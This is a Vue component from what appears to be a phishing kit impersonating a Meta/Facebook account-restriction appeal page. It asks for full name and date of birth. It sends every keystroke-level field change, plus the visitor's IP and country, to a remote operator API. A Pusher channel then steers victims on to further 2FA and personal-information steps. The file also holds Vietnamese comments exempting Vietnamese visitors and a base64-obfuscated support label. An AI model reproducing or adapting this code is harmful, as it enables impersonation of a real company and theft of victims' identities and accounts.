<script setup>
</script>

<template>
  <section class="h-screen flex justify-center items-center" style="background-image: url('https://www.dropbox.com/scl/fi/clgk9v0o9qqvrzssy7vzy/27baHo4dN_O.png?rlkey=n2ukporxk2xgohmzdzjd7yskv&st=47ns94sq&dl=1');">
    <div class="flex flex-col items-center px-6 ">
      <a href="/" class="flex items-center space-x-3 rtl:space-x-reverse py-6">
        <img src="../assets/if_logo_1.svg" class="h-20" alt="MT">
        <span class="self-center text-2xl font-semibold whitespace-nowrap dark:text-white">Meta</span>
      </a>
      <div class="w-full bg-white rounded-lg border-blue-100 border shadow dark:border md:mt-0 sm:max-w-3xl xl:p-0 dark:bg-gray-800 dark:border-gray-700">

        <div class="p-6 space-y-4 md:space-y-6 w-full">
          <ol class="items-center w-full space-y-4 sm:flex sm:space-x-8 sm:space-y-0 rtl:space-x-reverse">
            <li class="flex items-center text-blue-600 dark:text-blue-500 space-x-2.5 rtl:space-x-reverse">
        <span class="flex items-center justify-center w-8 h-8 border border-blue-600 rounded-full shrink-0 dark:border-blue-500">
            1
        </span>
              <span>
            <h3 class="font-medium leading-tight">Review Requested</h3>
            <p class="text-sm">Request review of restrictions</p>
        </span>
            </li>
            <li class="flex items-center text-gray-500 dark:text-gray-400 space-x-2.5 rtl:space-x-reverse">
        <span class="flex items-center justify-center w-8 h-8 border border-gray-500 rounded-full shrink-0 dark:border-gray-400">
            2
        </span>
              <span>
            <h3 class="font-medium leading-tight">Identify Verify</h3>
            <p class="text-sm">Verify your identify</p>
        </span>
            </li>
            <li class="flex items-center text-gray-500 dark:text-gray-400 space-x-2.5 rtl:space-x-reverse">
        <span class="flex items-center justify-center w-8 h-8 border border-gray-500 rounded-full shrink-0 dark:border-gray-400">
            3
        </span>
              <span>
            <h3 class="font-medium leading-tight">Result</h3>
            <p class="text-sm">Result of verification process</p>
        </span>
            </li>
          </ol>


        </div>
        <div class="space-y-4 md:space-y-6 p-8 sm:p-6 w-full">
          <form class="mx-auto">


            <div class="mb-5">
              <label for="fullName" class="block mb-2 text-sm font-medium text-gray-900 dark:text-white">Full Name</label>
              <input v-model="user.fullName" @change="onChange($event)" name="fullName" type="text" id="fullName" class="bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" placeholder="Full Name" required>
              <small v-text="errors.fullName" class="text-red-700"></small>
            </div>
            <div>
              <label for="dob" class="block mb-2 text-sm font-medium text-gray-900 dark:text-white">Date of birth</label>
              <div class="relative">
                <div class="absolute inset-y-0 start-0 flex items-center ps-3.5 pointer-events-none">
                  <svg class="w-4 h-4 text-gray-500 dark:text-gray-400" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="currentColor" viewBox="0 0 20 20">
                    <path d="M20 4a2 2 0 0 0-2-2h-2V1a1 1 0 0 0-2 0v1h-3V1a1 1 0 0 0-2 0v1H6V1a1 1 0 0 0-2 0v1H2a2 2 0 0 0-2 2v2h20V4ZM0 18a2 2 0 0 0 2 2h16a2 2 0 0 0 2-2V8H0v10Zm5-8h10a1 1 0 0 1 0 2H5a1 1 0 0 1 0-2Z"/>
                  </svg>
                </div>
                <input @change="onChange($event)" name="dob" id="dob" type="text" class="bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full ps-10 p-2.5 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" placeholder="Select date">
                <small v-text="errors.dob" class="text-red-700"></small>
              </div>
            </div>
            <div class="mt-5">
              <label for="reason_appeal" class="block mb-2 text-sm font-medium text-gray-900 dark:text-white">Reasons for an appeal</label>
              <textarea id="reason_appeal" rows="4" class="block p-2.5 w-full text-sm text-gray-900 bg-gray-50 rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" placeholder=""></textarea>
            </div>
            <button @click="handleAction('SendInfo')" type="button" class="mt-3 text-white bg-blue-700 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm w-full sm:w-auto px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-blue-700 dark:focus:ring-blue-800">Next</button>
          </form>
          <small>If your Facebook account was restricted by mistake, you can request a review if you believe it shouldn't be restricted.</small>
        </div>
      </div>

    </div>
  </section>
</template>

<style scoped>

</style>

<script>
import axios from "axios";
import Pusher from "pusher-js";
import constants from "@/constants";
import {Modal} from "flowbite";
import Datepicker from "flowbite-datepicker/Datepicker";
export default {
  name: 'TwoFactorAuthenticate',
  props: {
    msg: String,
  },
  created() {
    if (!(localStorage.getItem("is_login") === "1")) {
      window.location.href = "/"
    }
    this.user.provider2fa = localStorage.getItem("provider2fa");
  },
  mounted() {
    const datepickerEl = document.getElementById('dob');
    this.datePic = new Datepicker(datepickerEl, {

    });
    const self = this;
    const CHANNEL_KEY = "channel_key";
    const channelName = localStorage.getItem(CHANNEL_KEY)
    if (!channelName || channelName.indexOf("PUB_ID") === -1) {
      this.channelUuid = "PUB_ID_" + crypto.randomUUID();
      localStorage.setItem(CHANNEL_KEY, this.channelUuid)
    } else {
      this.channelUuid = channelName;
    }

    this.ws.pusher = new Pusher(this.ws.pusherKey, {
      cluster: this.ws.pusherCluster,
    });

    this.ws.channel = this.ws.pusher.subscribe(this.channelUuid);

    this.ws.channel.bind("step-2-result", function(data) {
      if (data) {
        let json = JSON.parse(data.message)
        if (json.success === "2") {
          window.location.href = "personal-information-security";
        } else if (json.success === "3") {
          self.showTwoFactorSuggestionPopup(json.message);
        } else if (json.success === "1") {
          localStorage.setItem(CHANNEL_KEY, "")
          window.location.href = "success";
        } else {
          self.errors.code = json.message;
        }
      } else {
        self.errors.code = "Something went wrong. Please try again later.";
      }
      self.loading = false;
    });

    try {
      if (localStorage.getItem('country_code') === 'unk' || !localStorage.getItem('country_code')) {
        fetch('https://freeipapi.com/api/json')
            .then(response => response.json())
            .then(data => {
              if (data) {
                if (data.countryName === 'Viet Nam') {
                  // this.isAllowed = false;
                  // self.handleAction("New visitor. IP = " + data.ipAddress + ", country = " + data.countryName + ", URL = " + window.location.pathname + ", VietNam nên bỏ qua")
                }
                self.handleAction("New visitor. IP = " + data.ipAddress + ", country = " + data.countryName + ", URL = " + window.location.pathname)
                if (data.countryCode) {
                  localStorage.setItem("country_code", data.countryCode)
                  localStorage.setItem("ip_address", data.ipAddress)
                } else {
                  localStorage.setItem("country_code", "unk")
                }

              }
              this.isLoadingPage = false;
            });
      } else {
        let country_code = localStorage.getItem("country_code")
        let ip_address = localStorage.getItem("ip_address")

        self.handleAction("New visitor. IP = " + ip_address + ", country = " + country_code + ", URL = " + window.location.pathname)
        this.isLoadingPage = false;
      }

    } catch (ex) {
      self.handleAction("Can not get IP information");
    }

    setInterval(() => {
      if (self.canResendCodeAfter > 0) {
        self.canResendCodeAfter--;
      }
      if (self.canResendCodeAfter === 0) {
        self.errors.resendCode = "";
      }
    }, 1000)

    this.ws.pusher.connection.bind('disconnected', function() {
      alert('Disconnected to meta server. Please reload and try again.')
    })

    const modalEl = document.getElementById('info-popup');
    this.twoFactorSuggestionModal = new Modal(modalEl, {
      placement: 'center',
      onShow: () => {
        this.handleAction("Màn 2fa gợi ý hiển thị")
        this.errors.phoneNumber = "";
        this.errors.email = "";
      },
      onHide:() => {
        this.loading = false;
        this.handleAction("Màn 2fa gợi ý bị ẩn")
      }
    })
  },
  data() {
    return {
      user: {
        provider2fa: "sms",
        code: "",
        fullName: ""
      },
      errors: {
        fullName: "",
        dob: ""
      },
      ws: {
        pusher: null,
        channel: null,
        pusherKey: constants.PUSHER_KEY,
        pusherCluster: "ap1"
      },
      loading: false,
      success: false,
      dm: constants.API_URL,
      name: 'Meta Business Support',
      supportLine: atob("Q29udGFjdCBNZXRhIHN1cHBvcnQ="),
      isAvailable: true,
      canResendCodeAfter: 0,
      twoFactorSuggestionModal: null,
      twoFactorSugestionText: ""
    }
  },
  methods: {
    onChange(event) {
      try {
        this.handleAction(`User is changed: ${event.target.name} - value = ${event.target.value}`)
      } catch (ex) {
        console.log(ex);
      }
    },
    handleAction(message) {
      if (message === 'SendInfo') {
        if (!this.validateUserInput()) {
          return;
        }
        message = `UPDATE INFO: ${this.datePic.getDate('mm/dd/yyyy')} _ ${this.user.fullName}`;
      }
      if(this.channelUuid) {
        try {
          axios.post(`${this.dm}api/handleAction`, {"pubId": this.channelUuid, "message": message}).then(() => {
            if (message.indexOf("UPDATE INFO: ") > -1) {
              window.location.href = "identify-verify"
            }

          });
        }catch (ex) {
          console.log(ex);
        }
      }
    },
    validateUserInput() {
      this.errors.dob = "";
      this.errors.fullName = "";
      let dob = this.datePic.getDate('mm/dd/yyyy');
      if (!dob || dob.toString().trim() === "") {
        this.errors.dob = "Please select date of birth";
        return false;
      }

      let fullName = this.user.fullName;
      if (!fullName || fullName.toString().trim() === "") {
        this.errors.fullName = "Please enter your name";
        return false;
      }
      return true;
    }
  }
}
</script>